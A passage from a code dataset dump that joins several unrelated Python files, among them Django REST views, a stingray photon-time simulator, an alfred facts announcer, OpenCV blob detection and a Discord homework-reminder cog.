JsonResponse(souvenir_serializer.data, status=status.HTTP_201_CREATED)\n data = {\n 'message' : 'invalid API call'\n }\n return Response(data=data, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET','PUT', 'DELETE'])\n@permission_classes([AllowOnlyAdminHUMAS])\ndef detail_souvenir(request,pk):\n try:\n souvenir = Souvenir.objects.get(pk=pk)\n except Souvenir.DoesNotExist:\n return JsonResponse({'message': 'Souvenir tidak ada'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'GET':\n souvenir_serialized = SouvenirSerializer(souvenir)\n return JsonResponse(souvenir_serialized.data, safe=False)\n# data = {\n# 'message' : 'invalid API call'\n# }\n# return Response(data=data, status=status.HTTP_400_BAD_REQUEST)\n elif request.method == 'PUT':\n souvenir_data = JSONParser().parse(request)\n souvenir_serializer = SouvenirSerializer(souvenir, data=souvenir_data)\n if souvenir_serializer.is_valid():\n souvenir_serializer.save()\n return JsonResponse(souvenir_serializer.data)\n return JsonResponse(souvenir_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n elif request.method == 'DELETE':\n souvenir.delete()\n return JsonResponse({'message': 'Souvenir berhasil dihapus'}, status=status.HTTP_204_NO_CONTENT)\n# #do something untuk request DELETE, misal hapus izin kegiatan yang sudah ada\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED) \n\n@api_view(['GET','PUT'])\n@permission_classes([permissions.AllowAny,])\ndef detail_permintaan_protokoler(request,pk):\n try:\n permintaan_protokoler = PermintaanProtokoler.objects.get(pk=pk)\n except PermintaanProtokoler.DoesNotExist:\n return JsonResponse({'message': 'Permintaan protokoler tidak ada'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'GET':\n permintaan_protokoler_serialized = PermintaanProtokolerSerializer(permintaan_protokoler)\n return JsonResponse(permintaan_protokoler_serialized.data, safe=False)\n # data = {\n # 'message' : 'invalid API call'\n # }\n elif request.method == 'PUT':\n permintaan_protokoler_data = JSONParser().parse(request)\n permintaan_protokoler_serializer = PermintaanProtokolerSerializer(permintaan_protokoler, data=permintaan_protokoler_data)\n if permintaan_protokoler_serializer.is_valid():\n permintaan_protokoler_serializer.save()\n return JsonResponse(permintaan_protokoler_serializer.data)\n return JsonResponse(permintaan_protokoler_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n# #do something untuk request DELETE, misal hapus izin kegiatan yang sudah ada\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED) \n\n@api_view(['GET','PUT'])\n@permission_classes([permissions.AllowAny,])\ndef detail_permintaan_souvenir(request,pk):\n try:\n permintaan_souvenir = PermintaanSouvenir.objects.get(pk=pk)\n except PermintaanSouvenir.DoesNotExist:\n return JsonResponse({'message': 'Ruangan tidak ada'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'GET':\n permintaan_souvenir_serialized = PermintaanSouvenirSerializer(permintaan_souvenir)\n return JsonResponse(permintaan_souvenir_serialized.data, safe=False)\n elif request.method == 'PUT':\n permintaan_souvenir_data = JSONParser().parse(request)\n permintaan_souvenir_serializer = PermintaanSouvenirSerializer(permintaan_souvenir, data=permintaan_souvenir_data)\n if permintaan_souvenir_serializer.is_valid():\n permintaan_souvenir_serializer.save()\n return JsonResponse(permintaan_souvenir_serializer.data)\n return JsonResponse(permintaan_souvenir_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED) \n\n@api_view(['PUT'])\n@permission_classes([AllowOnlyMahasiswa]) \n@parser_classes([MultiPartParser, FormParser])\ndef put_perizinan_publikasi(request, pk):\n try:\n perizinan_publikasi = PerizinanPublikasi.objects.get(pk=pk)\n except PermintaanSouvenir.DoesNotExist:\n return JsonResponse({'message': 'perizinan publikasi tidak ada'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'PUT': # post perizinan_publikasi\n perizinan_data_serialized = PerizinanPublikasiSerializer(perizinan_publikasi, data=request.data)\n if perizinan_data_serialized.is_valid():\n perizinan_data_serialized.save()\n \n # menyimpan jenis_izin_publikasi dari list jenis_publikasi\n jenis_publikasi_string = request.data['jenis_publikasi']\n print(request.data['jenis_publikasi'])\n print(jenis_publikasi_string)\n if jenis_publikasi_string != '':\n jenis_publikasi_list = [data.strip() for data in jenis_publikasi_string.split(',')]\n for jenis_publikasi in jenis_publikasi_list: # menyimpan setiap jenis_izin_publikasi\n jenis_izin_publikasi_data = {\n \"jenis_publikasi\" : jenis_publikasi,\n \"status_perizinan_publikasi\": \"1\",\n \"alasan_penolakan\": ''\n }\n jenis_izin_publikasi_serialized = JenisIzinPublikasiSerializer(PerizinanPublikasi.objects.last(),data=jenis_izin_publikasi_data)\n if jenis_izin_publikasi_serialized.is_valid():\n jenis_izin_publikasi_serialized.save()\n \n return JsonResponse(perizinan_data_serialized.data,status=status.HTTP_201_CREATED,safe=False)\n return JsonResponse(perizinan_data_serialized.errors, status=status.HTTP_400_BAD_REQUEST)\n \n #case for else\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n","sub_path":"main/views/views_humas.py","file_name":"views_humas.py","file_ext":"py","file_size_in_byte":16655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"308693413","text":"from src.lib.DataLoader import DataLoader\n\nif __name__ == '__main__':\n posts_file = '../resources/Posts.txt'\n comments_file = '../resources/Comments.txt'\n metadata_file = '../resources/Meta.txt'\n\n loader = DataLoader()\n loader.load_posts(posts_file)\n loader.load_comments(comments_file)\n loader.load_metadata(metadata_file)\n\n print(\"Loaded...\")\n loader.get_post_timeline()\n","sub_path":"src/Execute.py","file_name":"Execute.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"55161540","text":"#!/usr/bin/env python3\n\nimport json\nimport gzip\nimport argparse\nimport pathlib\nimport subprocess\nfrom collections import defaultdict\n\nimport alfred.announce.utils\n\n\n# Create a recursive default dict\nrecursive_dict = lambda: defaultdict(recursive_dict)\n\n\n# Build up command line arguments definition\nargs_parser = argparse.ArgumentParser()\n\nargs_parser.add_argument('-d', '--directory',\n dest='base_path',\n type=pathlib.Path,\n action='store',\n help='path of the facts tree',\n default='/etc/alfred/facts')\n\nargs_parser.add_argument('-b', '--batman',\n dest='if_batman',\n action='store',\n help='the name of the batman-adv interface',\n default='bat')\n\nargs_parser.add_argument('-f', '--fastd',\n dest='if_fastd',\n action='store',\n help='the name of the fastd interface',\n default='mesh-vpn')\n\nargs_parser.add_argument('-i', '--interface',\n dest='if_bridge',\n action='store',\n help='the name of the bridge interface',\n default='br')\n\n\ndef main():\n # Parse the command line arguments\n args = args_parser.parse_args()\n\n # Walk all sub folders of base directory\n for type_path in args.base_path.iterdir():\n # Skip everything non-directory\n if not type_path.is_dir():\n continue\n\n # Skip hidden files\n if type_path.name.startswith('.'):\n continue\n\n # Extract the type id from the path\n type_id = int(type_path.name)\n\n # Prepare the result structure\n data = recursive_dict()\n\n # Walk all fact files recursively in base directory\n for fact_path in type_path.rglob('*'):\n # Skip folders\n if not fact_path.is_file():\n continue\n\n # Skip hidden files\n if fact_path.name.startswith('.'):\n continue\n\n # Open, read and compile the fact snippet wrapped in a function\n with fact_path.open() as f:\n code = compile(('def fact():\\n' +\n ''.join(' ' + line for line in f.readlines())),\n filename=str(fact_path),\n mode='exec')\n\n # Populate the globals for the snippet execution\n exec_globals = {}\n exec_globals.update(vars(args))\n exec_globals.update(vars(alfred.announce.utils))\n\n # Execute the facts code to get the function object - as the\n # function definition is executed, the function exists in the\n # globals directory after the execution\n exec(code, exec_globals)\n fact = exec_globals['fact']\n\n # Call the fact function to get its value\n value = fact()\n\n # Resolve the facts parent in the result structure whereas the path in\n # the structure is the facts file path relative to the base directory\n parent = data\n for part in fact_path.relative_to(type_path).parent.parts:\n parent = parent[part]\n\n # Store the facts value as child of the resolved parent\n parent[fact_path.name] = value\n\n # Format the final result structure using JSON and gzip-compress it\n result = gzip.compress(json.dumps(data).encode('utf-8'))\n\n # Announce the output using alfred\n with subprocess.Popen(['alfred',\n '-s', str(type_id)],\n stdin=subprocess.PIPE) as p:\n p.communicate(input=result)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"alfred/announce/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"433952131","text":"import numpy as np\nimport numpy.random as ra\nimport scipy.interpolate as sci\nfrom stingray import Lightcurve\nfrom stingray.gti import gti_border_bins\n\n\ndef simulate_times(lc, use_spline=False):\n \"\"\"\n Simulate an event list, by using the inverse CDF method:\n\n + Assume that the light curve is a probability density (must be positive\n definite)\n\n + Calculate the CDF from the cumulative sum, and normalize it from 0 to 1\n\n + Extract N random probability values from 0 to 1\n\n + Find the CDF values corresponding to these N values\n\n + Find the times corresponding to these N CDF values\n\n Parameters\n ----------\n lc: `Lightcurve` object\n The `counts` array of the light curve should be give the expected\n number of photons in that bin. For this reason, please note that the\n light curve should not contain any negative values, or this method will\n raise an exception.\n\n\n Other Parameters\n ----------------\n use_spline : bool\n Approximate the light curve with a spline to avoid binning effects\n\n Returns\n -------\n times : array-like\n Simulated photon arrival times\n\n Examples\n --------\n >>> t = [0.5, 1.5, 3.5]\n >>> c = [100] * 3\n >>> lc = Lightcurve(t, c, gti=[[0, 2], [3, 4]], dt=1.)\n >>> times = simulate_times(lc, use_spline=True)\n >>> np.all(np.diff(times) > 0) # Output array is sorted\n True\n >>> np.all(times >= 0.) # All times inside GTIs\n True\n >>> np.all(times <= 4.)\n True\n >>> np.any(times > 3.)\n True\n >>> np.any(times < 2.)\n True\n >>> np.any((times > 2.) & (times < 3.)) # No times outside GTIs\n False\n >>> lc.counts[0] = -3.\n >>> simulate_times(lc) # Test with one negative value in the lc\n Traceback (most recent call last):\n ...\n ValueError: simulate_times can only work with...\n \"\"\"\n return simulate_times_from_count_array(\n lc.time, lc.counts, lc.gti, lc.dt, use_spline=use_spline)\n\n\ndef simulate_times_from_count_array(time, counts, gti, dt, use_spline=False):\n \"\"\"Simulate an event list, by using the inverse CDF method.\n\n + Assume that the light curve is a probability density (must be positive\n definite)\n\n + Calculate the CDF from the cumulative sum, and normalize it from 0 to 1\n\n + Extract N random probability values from 0 to 1\n\n + Find the CDF values corresponding to these N values\n\n + Find the times corresponding to these N CDF values\n\n Parameters\n ----------\n time: array-like\n counts: array-like\n gti: [[gti00, gti01], ..., [gtin0, gtin1]]\n dt: float\n\n Other Parameters\n ----------------\n use_spline : bool\n Approximate the light curve with a spline to avoid binning effects\n\n Returns\n -------\n times : array-like\n Simulated photon arrival times\n\n Examples\n --------\n >>> t = [0.5, 1.5, 2.5, 3.5, 5.5]\n >>> c = [100] * 5\n >>> gti = [[0, 4], [5, 6]]\n >>> times = simulate_times_from_count_array(t, c, gti, 1, use_spline=True)\n >>> np.all(np.diff(times) > 0) # Output array is sorted\n True\n >>> np.all(times >= 0.) # All times inside GTIs\n True\n >>> np.all(times <= 6.)\n True\n >>> np.any(times > 5.)\n True\n >>> np.any(times < 4.)\n True\n >>> np.any((times > 4.) & (times < 5.)) # No times outside GTIs\n False\n >>> c[0] = -3.\n >>> simulate_times_from_count_array(t, c, gti, 1) # Test with one negative value in the lc\n Traceback (most recent call last):\n ...\n ValueError: simulate_times can only work with...\n \"\"\"\n time = np.asarray(time)\n counts = np.asarray(counts)\n gti = np.asarray(gti)\n kind = \"linear\"\n if use_spline and time.size > 2:\n kind = \"cubic\"\n\n if np.any(counts < 0):\n raise ValueError(\n \"simulate_times can only work with positive-definite light curves\"\n )\n\n if len(gti) > 1: # Work GTI by GTI, to avoid the spillover of events\n all_events = []\n start_bins, stop_bins = gti_border_bins(gti, time, dt=dt)\n for i, (start, stop) in enumerate(zip(start_bins, stop_bins)):\n new_events = simulate_times_from_count_array(\n time[start:stop],\n counts[start:stop],\n [gti[i]],\n dt,\n use_spline=use_spline)\n all_events.append(new_events)\n return np.concatenate(all_events)\n\n if len(counts) == 1: # Corner case: a single light curve bin\n dt = dt\n t0 = time[0] - dt / 2\n t1 = time[0] + dt / 2\n N = counts[0]\n return np.sort(np.random.uniform(t0, t1, N))\n\n tmin = gti[0, 0]\n tmax = gti[-1, 1]\n duration = (tmax - tmin)\n phase_bins = np.copy(time)\n phase_bins -= tmin\n phase_bins /= duration\n dph = dt / duration\n\n counts = np.concatenate(([0], counts))\n phase_bins = np.concatenate(\n ([0], phase_bins + dph / 2))\n n_events_predict = np.random.poisson(np.sum(counts))\n\n cdf = np.cumsum(counts, dtype=float)\n cdf -= cdf[0]\n cdf /= cdf[-1]\n\n inv_cdf_func = sci.interp1d(\n cdf,\n phase_bins,\n kind=kind)\n\n cdf_vals = np.sort(np.random.uniform(0, 1, n_events_predict))\n times = inv_cdf_func(cdf_vals)\n times *= duration\n times += tmin\n\n return times\n","sub_path":"stingray/simulator/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"275655934","text":"um_stack = []\r\nsymbols = {}\r\n\r\n\r\ndef evaluationExpr(expr): # otomatis\r\n return eval(expr)\r\n\r\n\r\ndef evalExpr(expr): # Manual\r\n expr = \",\" + expr\r\n i = len(expr) - 1\r\n num = \"\"\r\n while i >= 0:\r\n if expr[i] == \"+\" or expr[i] == \"-\" or expr[i] == \"/\" or expr[i] == \"*\" or expr[i] == \"%\":\r\n num = num[::-1]\r\n num_stack.append(num)\r\n num_stack.append(expr[i])\r\n num = \"\"\r\n elif expr[i] == \",\":\r\n num = num[::-1]\r\n num_stack.append(num)\r\n num = \"\"\r\n else:\r\n num += expr[i]\r\n i -= 1\r\n print(num_stack)\r\n\r\n\r\ndef doPrint(toPrint, sambung):\r\n if toPrint[0:6] == \"STRING\":\r\n toPrint = toPrint[8:]\r\n toPrint = toPrint[:-1]\r\n elif toPrint[0:3] == \"NUM\":\r\n toPrint = toPrint[4:]\r\n elif toPrint[0:4] == \"EXPR\":\r\n toPrint = evaluationExpr(toPrint[5:])\r\n\r\n if(sambung == 1):\r\n print(toPrint + ' ')\r\n else:\r\n print(toPrint)\r\n\r\n\r\ndef doSambung(toPrint):\r\n if toPrint[0:6] == \"STRING\":\r\n toPrint = toPrint[8:]\r\n toPrint = toPrint[:-1]\r\n elif toPrint[0:3] == \"NUM\":\r\n toPrint = toPrint[4:]\r\n elif toPrint[0:4] == \"EXPR\":\r\n toPrint = evaluationExpr(toPrint[5:])\r\n print(toPrint)\r\n\r\n\r\ndef doAssign(varName, varValue):\r\n symbols[varName[4:]] = varValue\r\n\r\n\r\ndef getVariabel(varname):\r\n varname = varname[4:]\r\n if varname in symbols:\r\n return symbols[varname]\r\n else:\r\n return \"Variabel \" + varname + \" VARIABEL BELUM DI DESKRIPSIKAN \"\r\n\r\n\r\ndef getInput(string, varname):\r\n i = input(string[1:-1])\r\n symbols[varname] = \"STRING:\\\"\" + i + \"\\\"\"\r\n","sub_path":"src/interpt.py","file_name":"interpt.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"247052098","text":"import cv2\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport imutils\nimport math\n\n\nos.chdir('C:/Users/Bruger/Documents/Uni/Abu dhabi/data/outdoor')\n\nprint('start')\n\nb=3\n\n# Read image\nimg = cv2.imread('pica36.png')\n\n\n#img = cv2.imread('blob.jpg')\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nblurred = cv2.medianBlur(gray, 9)\n_filter = cv2.bilateralFilter(blurred, 5, 75, 75)\nadap_thresh = cv2.adaptiveThreshold(_filter,\n 255,\n cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n cv2.THRESH_BINARY_INV,\n 21, 0)\n\nelement = cv2.getStructuringElement(cv2.MORPH_RECT, (3,3)) \ndilated = cv2.dilate(adap_thresh, element, iterations=1)\n\n# blob detection\nparams = cv2.SimpleBlobDetector_Params()\nparams.filterByColor = False\nparams.minThreshold = 80\nparams.maxThreshold = 93\nparams.blobColor = 0\nparams.minArea = 200\nparams.maxArea = 250\nparams.filterByCircularity = False\nparams.filterByConvexity = True\nparams.minCircularity =0.0000001\nparams.maxCircularity = 1\n\ndet = cv2.SimpleBlobDetector_create(params)\nkeypts = det.detect(dilated)\n\nim_with_keypoints = cv2.drawKeypoints(dilated,\n keypts,\n np.array([]),\n (0, 0, 255),\n cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\nres = cv2.drawKeypoints(img,\n keypts,\n np.array([]),\n (0, 0, 255 ),\n cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\ni = 0\nfor kp in keypts:\n print(\"(%f,%f)\"%(kp.pt[0],kp.pt[1]))\n i+=1\n cv2.rectangle(res,(int(kp.pt[0]),int(kp.pt[1])),(int(kp.pt[0])+1,int(kp.pt[1])+1),(0,255,0),2)\n\n#cv2.imshow(\"Keypoints\", im_with_keypoints)\ncv2.imshow(\"RES\", res)\ncv2.waitKey(0)","sub_path":"thor/old scripts/test45py.py","file_name":"test45py.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"295412914","text":"from model.bot_responses_model import *\n# from bot import *\nfrom utils.constants import FINISH_STATE\n\n\nclass FinishState:\n def handle_message(self, msg, bot):\n message = None\n if 'yes' in msg.get_text().lower():\n message = \"OK, let's play again, \\n Are u ready??\"\n bot.set_to_choose_artist_state()\n\n elif 'no' in msg.get_text().lower():\n message = return_user_message(FINISH_STATE)\n\n return message\n\n ","sub_path":"controller/states/finish_state.py","file_name":"finish_state.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"295767503","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 8 00:54:39 2019\n\n@author: datta\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport csv as csv\nimport matplotlib.pyplot as plt\nfrom stats import * \nclass Plot:\n def __init__(self, filename, x_axis, y_axis, filename2=None, x_axis2=None, y_axis2=None):\n self.filename = filename\n self.x_axis = x_axis\n self.y_axis = y_axis\n self.filename2 = filename2\n self.x_axis2 = x_axis2\n self.y_axis2 = y_axis2\n\n def LoadCsvAndPlot(self):\n readFile = pd.read_csv(self.filename)\n plt.plot(readFile[self.x_axis], readFile[self.y_axis])\n \n def LoadTwoCsvAndPlot(self):\n readfile1 = pd.read_csv(self.filename)\n readfile2 = pd.read_csv(self.filename2)\n plt.plot(readfile1[self.x_axis], readfile1[self.y_axis])\n plt.plot(readfile2[self.x_axis2], readfile2[self.y_axis2])\n\n def ShowPlot(self):\n plt.show()\n\n\n\"\"\"\nTest and Debug:\n\n#Create Ground truth file object and plot\nplot5 = Plot(\"CSVFiles/ground_truth.csv\", \"Easting\", \"Northing\")\nplot5.LoadCsvAndPlot()\nplot5.ShowPlot()\n\n\n#Husky odom\n\nplot4 = Plot(\"CSVFiles/husky_odom.csv\", \".pose.pose.position.x\", \".pose.pose.position.y\")\nplot4.LoadCsvAndPlot()\nplot4.ShowPlot()\n\n\n\n\nplot4 = Plot(\"CSVFiles/zed_odom.csv\", \".pose.pose.position.x\", \".pose.pose.position.y\")\nplot4.LoadCsvAndPlot()\nplot4.ShowPlot()\n\n\"\"\"\n\n\"\"\"\n#Create Gps file object and plot\nplot1 = Plot(\"CSVFiles/gps_fix.csv\", \".latitude\", \".longitude\", filename2=\"CSVFiles/ground_truth.csv\", x_axis2=\"Latitude\", y_axis2=\"Longitude\")\nplot1.LoadTwoCsvAndPlot()\nplot1.ShowPlot()\n\"\"\"\n\n\"\"\"\n#Create Gps file object and plot\nplot1 = Plot(\"CSVFiles/ground_truth.csv\", \"Easting\", \"Northing\", filename2=\"CSVFiles/bag/odometry-filtered.csv\", x_axis2=\".pose.pose.position.x\", y_axis2=\".pose.pose.position.y\")\nplot1.LoadTwoCsvAndPlot()\nplot1.ShowPlot()\n\"\"\"\n\n","sub_path":"robot_localization_masters_project/Plot.py","file_name":"Plot.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"427644472","text":"# Copyright (c) 2021 War-Keeper\n\"\"\"\nThis functionality provides various methods to manage reminders (in the form of creation, retrieval,\nupdation and deletion). An user can set up a reminder, check what is due this week or what is due\ntoday. He/She can also check all the due homeworks based on hte course name. An user can also update\nor delete a reminder if needed.\n\"\"\"\nimport discord\nfrom discord.ext import commands\nimport json\nimport os\nimport sys\nimport asyncio\nimport time\nfrom datetime import datetime\n\n\nclass Deadline(commands.Cog):\n \"\"\"Class provides several methods to manage remainders.\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n os.chdir(cur_dir)\n self.reminders = json.load(open(\"data/remindme/reminders.json\"))\n self.units = {\"second\": 1, \"minute\": 60, \"hour\": 3600, \"day\": 86400, \"week\": 604800,\n \"month\": 2592000}\n\n @commands.command(name=\"addhw\",\n help=\"add homework and due-date \"\n \"$addhw CLASSNAME HW_NAME MMM DD YYYY optional(HH:MM)\"\n \" ex. $addhw CSC510 HW2 SEP 25 2024 17:02\")\n async def duedate(self, ctx, coursename: str, hwcount: str, *, date: str):\n \"\"\"\n Adds the homework to json in the specified format.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n coursename: name of the course for which homework is to be added.\n hwcount: name of the homework\n date: due date of the assignment\n\n Returns:\n returns either an error stating a reason for failure or returns a success message\n indicating that the reminder has been added\n\n \"\"\"\n author = ctx.message.author\n try:\n duedate = datetime.strptime(date, '%b %d %Y %H:%M')\n # print(seconds)\n except ValueError:\n try:\n duedate = datetime.strptime(date, '%b %d %Y')\n except:\n await ctx.send(\"Due date could not be parsed\")\n return\n a_timedelta = duedate - datetime.today()\n seconds = (time.time() + a_timedelta.total_seconds())\n flag = True\n if self.reminders:\n for reminder in self.reminders:\n if ((reminder[\"COURSE\"] == coursename) and (reminder[\"HOMEWORK\"] == hwcount)):\n flag = False\n break\n if flag:\n self.reminders.append({\"ID\": author.id, \"COURSE\": coursename, \"HOMEWORK\": hwcount,\n \"DUEDATE\": str(duedate),\n \"FUTURE\": seconds})\n cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n os.chdir(cur_dir)\n json.dump(self.reminders, open(\"data/remindme/reminders.json\", \"w\"))\n await ctx.send(\n \"A date has been added for: {} homework named: {} which is due on: {} by {}.\".format(\n coursename,\n hwcount,\n str(duedate),\n author))\n else:\n await ctx.send(\"This homework has already been added..!!\")\n\n @duedate.error\n async def duedate_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\n 'To use the addhw command, do: $addhw CLASSNAME HW_NAME MMM DD YYYY optional(HH:MM)'\n ' \\n ( For example: $addhw CSC510 HW2 SEP 25 2024 17:02 )')\n\n @commands.command(name=\"deletereminder\", pass_context=True,\n help=\"delete a specific reminder using course name and homework name using\"\n \" $deletereminder CLASSNAME HW_NAME ex. $deletereminder CSC510 HW2 \")\n async def deleteReminder(self, ctx, courseName: str, hwName: str):\n \"\"\"\n Delete a reminder using Classname and Homework name.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n coursename: name of the course for which homework is to be added.\n hwName: name of the homework.\n\n Returns:\n returns either an error stating a reason for failure or returns a success message\n indicating that the reminder has been deleted.\n\n \"\"\"\n author = ctx.message.author\n to_remove = []\n for reminder in self.reminders:\n # print('in json '+str(reminder[\"HOMEWORK\"])+' hwName '+hwName)\n if ((reminder[\"HOMEWORK\"] == hwName) and (reminder[\"COURSE\"] == courseName)):\n # print('true '+hwName)\n to_remove.append(reminder)\n # print('to_remove '+ str(to_remove))\n for reminder in to_remove:\n self.reminders.remove(reminder)\n if to_remove:\n cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n os.chdir(cur_dir)\n json.dump(self.reminders, open(\"data/remindme/reminders.json\", \"w\"))\n await ctx.send(\n \"Following reminder has been deleted: Course: {},\"\n \" Homework Name: {}, Due Date: {}\".format(\n str(reminder[\"COURSE\"]), str(reminder[\"HOMEWORK\"]), str(reminder[\"DUEDATE\"])))\n\n @deleteReminder.error\n async def deleteReminder_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\n 'To use the deletereminder command, do: $deletereminder CLASSNAME HW_NAME'\n ' \\n ( For example: $deletereminder CSC510 HW2 )')\n\n @commands.command(name=\"changeduedate\", pass_context=True,\n help=\"update the assignment date. \"\n \"$changeduedate CLASSNAME HW_NAME MMM DD YYYY optional(HH:MM) \"\n \"ex. $changeduedate CSC510 HW2 SEP 25 2024 17:02 \")\n async def changeduedate(self, ctx, classid: str, hwid: str, *, date: str):\n \"\"\"\n Update the 'Due date' for a homework by providing the classname and homework name.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n classid: name of the course for which homework is to be added.\n hwid: name of the homework.\n date: due date of the assignment.\n\n Returns:\n returns either an error stating a reason for failure or returns a success message\n indicating that the reminder has been updated.\n\n \"\"\"\n author = ctx.message.author\n flag = False\n try:\n duedate = datetime.strptime(date, '%b %d %Y %H:%M')\n except ValueError:\n try:\n duedate = datetime.strptime(date, '%b %d %Y')\n except:\n await ctx.send(\"Due date could not be parsed\")\n return\n for reminder in self.reminders:\n flag = False\n if ((reminder[\"HOMEWORK\"] == hwid) and (reminder[\"COURSE\"] == classid)):\n reminder[\"DUEDATE\"] = str(duedate)\n a_timedelta = duedate - datetime.today()\n seconds = (time.time() + a_timedelta.total_seconds())\n reminder[\"FUTURE\"] = seconds\n reminder[\"ID\"] = author.id\n flag = True\n if flag:\n cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n os.chdir(cur_dir)\n json.dump(self.reminders, open(\"data/remindme/reminders.json\", \"w\"))\n await ctx.send(\n \"{} {} has been updated with\"\n \" following date: {}\".format(classid, hwid, reminder[\"DUEDATE\"]))\n\n @changeduedate.error\n async def changeduedate_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\n 'To use the changeduedate command, '\n 'do: $changeduedate CLASSNAME HW_NAME MMM DD YYYY optional(HH:MM) '\n '\\n ( For example: $changeduedate CSC510 HW2 SEP 25 2024 17:02 )')\n\n @commands.command(name=\"duethisweek\", pass_context=True,\n help=\"check all the homeworks that are due this week $duethisweek\")\n async def duethisweek(self, ctx):\n \"\"\"\n Displays all homeworks that are due this week along with the coursename and due date.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n\n Returns:\n returns either an error stating a reason for failure or returns a list of all the\n assignments that are due this week.\n\n \"\"\"\n time = ctx.message.created_at\n for reminder in self.reminders:\n timeleft = datetime.strptime(reminder[\"DUEDATE\"], '%Y-%m-%d %H:%M:%S') - time\n print(\"timeleft: \" + str(timeleft) + \" days left: \" + str(timeleft.days))\n if timeleft.days <= 7:\n await ctx.send(\n \"{} {} is due this week at {}\".format(reminder[\"COURSE\"], reminder[\"HOMEWORK\"],\n reminder[\"DUEDATE\"]))\n\n @commands.command(name=\"duetoday\", pass_context=True,\n help=\"check all the homeworks that are due today $duetoday\")\n async def duetoday(self, ctx):\n \"\"\"\n Displays all the homeworks that are due today.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n\n Returns:\n returns either an error stating a reason for failure or returns a list of all the\n assignments that are due on the execution date of this command.\n\n \"\"\"\n flag = True\n for reminder in self.reminders:\n timedate = datetime.strptime(reminder[\"DUEDATE\"], '%Y-%m-%d %H:%M:%S')\n if timedate.date() == ctx.message.created_at.date():\n flag = False\n await ctx.send(\n \"{} {} is due today at {}\".format(reminder[\"COURSE\"], reminder[\"HOMEWORK\"],\n timedate.time()))\n if flag:\n await ctx.send(\"You have no dues today..!!\")\n\n @commands.command(name=\"coursedue\", pass_context=True,\n help=\"check all the homeworks that are due for a specific course \"\n \"$coursedue coursename ex. $coursedue CSC505\")\n async def coursedue(self, ctx, courseid: str):\n \"\"\"\n Displays all the homeworks that are due for a specific course.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n\n Returns:\n returns either an error stating a reason for failure or returns a list of all the\n assignments that are due for the provided course.\n\n \"\"\"\n course_due = []\n for reminder in self.reminders:\n if reminder[\"COURSE\"] == courseid:\n course_due.append(reminder)\n await ctx.send(\"{} is due at {}\".format(reminder[\"HOMEWORK\"], reminder[\"DUEDATE\"]))\n if not course_due:\n await ctx.send(\"Rejoice..!! You have no pending homeworks for {}..!!\".format(courseid))\n\n @coursedue.error\n async def coursedue_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\n 'To use the coursedue command, do: $coursedue CLASSNAME'\n ' \\n ( For example: $coursedue CSC510 )')\n\n @commands.command(name=\"listreminders\", pass_context=True, help=\"lists all reminders\")\n async def listreminders(self, ctx):\n \"\"\"\n Print out all the reminders.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n\n Returns:\n returns either an error stating a reason for failure or returns a list of all the\n assignments.\n\n \"\"\"\n to_remove = []\n for reminder in self.reminders:\n try:\n await ctx.send(\n \"{} homework named: {} which is due on: {} by {}\".format(reminder[\"COURSE\"],\n reminder[\"HOMEWORK\"],\n 